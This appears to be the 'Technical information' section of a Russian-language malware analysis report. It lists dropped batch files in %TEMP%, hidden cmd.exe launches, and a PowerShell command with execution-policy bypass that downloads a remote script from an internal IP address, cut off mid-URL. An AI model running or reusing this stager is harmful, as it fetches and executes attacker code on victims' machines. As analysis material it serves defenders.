Техническая информация
- %TEMP%\f5c3.tmp\f5c4.tmp\f5c5.bat
- %TEMP%\f5c3.tmp\f5c4.tmp\f5c5.bat
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\F5C3.tmp\F5C4.tmp\F5C5.bat <Полный путь к файлу>"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\F5C3.tmp\F5C4.tmp\F5C5.bat <Полный путь к файлу>"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nol -w 1 -ep -noprofile bypass "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://172.20.10.4:8080/download/powershell/Om1hdHRpZmVzdGF0a...